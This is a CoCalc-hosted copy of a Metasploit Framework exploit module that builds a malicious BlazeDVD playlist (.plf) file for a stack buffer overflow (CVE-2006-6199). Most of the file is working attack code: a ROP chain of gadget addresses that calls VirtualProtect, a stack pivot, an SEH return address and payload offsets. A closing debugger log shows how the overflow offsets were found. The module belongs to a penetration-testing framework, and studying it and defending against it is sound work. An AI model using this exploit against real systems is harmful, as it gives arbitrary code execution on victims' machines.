CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/blazedvd_plf.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::FILEFORMAT

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'BlazeDVD 6.1 PLF Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When

16
          the application is used to open a specially crafted plf file,

17
          a buffer is overwritten allowing for the execution of arbitrary code.

18
      },

19
      'License'        => MSF_LICENSE,

20
      'Author'         =>

21
         [

22
           'MC', # Developed target 5.1

23
           'Deepak Rathore', # ExploitDB PoC

24
           'Spencer McIntyre', # Developed taget 6.2

25
           'Ken Smith' # Developed target 6.2

26
         ],

27
      'References'     =>

28
        [

29
          [ 'CVE' , '2006-6199' ],

30
          [ 'EDB', '32737' ],

31
          [ 'OSVDB', '30770' ],

32
          [ 'BID', '35918' ],

33
        ],

34
      'DefaultOptions' =>

35
        {

36
          'EXITFUNC' => 'process',

37
          'AllowWin32SEH' => true

38
        },

39
      'Payload'        =>

40
        {

41
          'Space'    => 750,

42
          'BadChars' => "\x00\x0a\x1a",

43
          'DisableNops'  =>  true

44
        },

45


46
      'Platform' => 'win',

47
      'Targets'        =>

48
        [

49
          [ 'BlazeDVD 6.2',

50
            {

51
              'Payload' =>

52
                {

53
                  # Stackpivot => add esp,0xfffff254

54
                  'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"

55
                }

56
            }

57
          ],

58
          [ 'BlazeDVD 5.1',

59
            {

60
              'Ret' => 0x100101e7,

61
              'Payload' =>

62
                {

63
                  'EncoderType' => Msf::Encoder::Type::AlphanumUpper

64
                }

65
            }

66
          ],

67
        ],

68
      'Privileged'     => false,

69
      'DisclosureDate' => '2009-08-03',

70
      'DefaultTarget'  => 0,

71
      'Notes'          =>

72
        {

73
          'Stability'   => [ CRASH_SERVICE_DOWN, ],

74
          'SideEffects' => [ SCREEN_EFFECTS, ],

75
        },

76
    ))

77


78
    register_options(

79
      [

80
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),

81
      ])

82
  end

83


84
  def rop_chain

85
    # rop chain generated with mona.py - www.corelan.be

86
    case target.name

87
    when 'BlazeDVD 6.2'

88
      rop_gadgets = [ ]

89
      # 0x6162e802 RETN (ROP NOP) [EPG.dll]

90
      rop_gadgets.fill(0x6162e802, 0..7)

91
      rop_gadgets += [

92
        0x61636758, # POP EAX # RETN [EPG.dll]

93
        0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]

94
        0x616306ed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]

95
        0x616385d8, # XCHG EAX,ESI # RETN 0x00 [EPG.dll]

96
        0x61628ea2, # POP EBP # RETN [EPG.dll]

97
        0x616069a1, # push esp # ret 0x04 [EPG.dll]

98
        0x61626702, # POP EAX # RETN [EPG.dll]

99
        0xfffffdff, # Value to negate, will become 0x00000201

100
        0x61627d9c, # NEG EAX # RETN [EPG.dll]

101
        0x61640124, # XCHG EAX,EBX # RETN [EPG.dll]

102
        0x61629938, # POP EAX # RETN [EPG.dll]

103
        0xffffffc0, # Value to negate, will become 0x00000040

104
        0x61627d9c, # NEG EAX # RETN [EPG.dll]

105
        0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll]

106
        0x61612f5a, # POP ECX # RETN [EPG.dll]

107
        0x100142ab, # &Writable location [SkinScrollBar.Dll]

108
        0x616313ac, # POP EDI # RETN [EPG.dll]

109
        0x6162e588, # RETN (ROP NOP) [EPG.dll]

110
        0x6162d638, # POP EAX # RETN [EPG.dll]

111
        0x90909090, # nop

112
        0x61620831, # PUSHAD # RETN [EPG.dll]

113
      ]

114
    end

115
    return rop_gadgets.flatten.pack("V*")

116
  end

117


118
  def exploit

119
    case target.name

120
    when 'BlazeDVD 5.1'

121
      plf = rand_text_alpha_upper(6024)

122
      plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2)  + [target.ret].pack('V')

123
      plf[876,12] = make_nops(12)

124
      plf[888,payload.encoded.length] = payload.encoded

125
    when 'BlazeDVD 6.2'

126
      plf = rand_text_alphanumeric(260)

127
      plf << rop_chain

128
      plf << payload.encoded

129
    end

130


131
    print_status("Creating '#{datastore['FILENAME']}' file ...")

132
    file_create(plf)

133
  end

134
end

135


136
=begin

137
0:000> !exchain

138
0012f2c8: 31644230

139
Invalid exception stack at 64423963

140
0:000> !pattern_offset 6024 0x31644230

141
[Byakugan] Control of 0x31644230 at offset 872.

142
0:000> !pattern_offset 6024 0x64423963

143
[Byakugan] Control of 0x64423963 at offset 868.

144
0:000> s -b 0x10000000 0x10018000 5e 59 c3

145
100012cd  5e 59 c3 56 8b 74 24 08-57 8b f9 56 e8 a2 3c 00  ^Y.V.t$.W..V..<.

146
100101e7  5e 59 c3 90 90 90 90 90-90 8b 44 24 08 8b 4c 24  ^Y........D$..L$

147
0:000> u 0x100012cd L3

148
skinscrollbar!SkinSB_ParentWndProc+0x1fd:

149
100012cd 5e              pop     esi

150
100012ce 59              pop     ecx

151
100012cf c3              ret

152
=end

153


154